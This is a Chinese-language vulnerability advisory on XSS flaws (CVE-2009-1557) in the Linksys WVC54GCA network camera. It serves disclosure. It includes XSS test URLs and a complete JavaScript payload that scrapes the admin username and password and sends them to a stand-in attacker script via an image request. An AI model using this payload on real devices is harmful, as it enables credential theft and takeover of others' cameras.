首页 -> 安全研究
安全研究
安全漏洞
Linksys WVC54GCA多个跨站脚本漏洞
发布日期:2009-04-25
更新日期:2009-04-28
受影响系统:
Linksys WVC54GCA 1.00 R24描述:
Linksys WVC54GCA 1.00 R22
BUGTRAQ ID: 34714
CVE(CAN) ID: CVE-2009-1557
Linksys WVC54GCA是一款无线网络摄像头。
Linksys WVC54GCA的img/main.cgi、main.cgi和adm/file.cgi模块没有正确地过滤对next_file参数所传送的参数便返回给了用户,远程攻击者可以通过向摄像头的控制台提交恶意请求执行跨站脚本攻击。
<*来源:pagvac
链接:http://secunia.com/advisories/34767/
http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-4/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/adm/file.cgi?next_file=%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/img/main.cgi?next_file=%3Cimg%20src%3dx%20onerror%3dalert(1)%3E
http://www.example.com/main.cgi?next_file=%3Cimg%20src%3dx%20onerror%3dalert(1)%3E
// evil.js : malicious JS file, typically located on attacker's site
// payload description: steals Linksys WVC54GCA admin password via XSS
// tested on FF3 and IE7
// based on code from developer.apple.com
function loadXMLDoc(url) {
req = false;
// branch for native XMLHttpRequest object
if(window.XMLHttpRequest && !(window.ActiveXObject)) {
try {
req = new XMLHttpRequest();
}
catch(e) {
req = false;
}
}
// branch for IE/Windows ActiveX version
else if(window.ActiveXObject) {
try {
req = new ActiveXObject("Msxml2.XMLHTTP");
}
catch(e) {
try {
req = new ActiveXObject("Microsoft.XMLHTTP");
}
catch(e) {
req = false;
}
}
}
if(req) {
req.onreadystatechange = processReqChange;
req.open("GET", url, true);
req.send("");
}
}
// end of loadXMLDoc(url)
function processReqChange() {
// only if req shows "loaded"
if (req.readyState == 4) {
// only if "OK"
if (req.status == 200) {
var bits=req.responseText.split(/\"/);
var gems="";
// dirty credentials-scraping code
for (i=0;i<bits.length;++i) {
if(bits[i]=="adm" && bits[i+1]==" value=") {
gems+="login=";
gems+=bits[i+2];
}
if(bits[i]=="admpw" && bits[i+1]==" value=") {
gems+='&password=';
gems+=bits[i+2];
}
}
alert(gems); // this line is for demo purposes only and would be removed in a real attack
c=new Image();
c.src='http://www.example.com/x.php?'+gems; // URL should point to data-theft script on attacker's site
}
}
}
var url="/adm/file.cgi?next_file=pass_wd.htm";
loadXMLDoc(url);
建议:
厂商补丁:
Linksys
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.linksys.com
浏览次数:2400
严重程度:0(网友投票)
绿盟科技给您安全的保障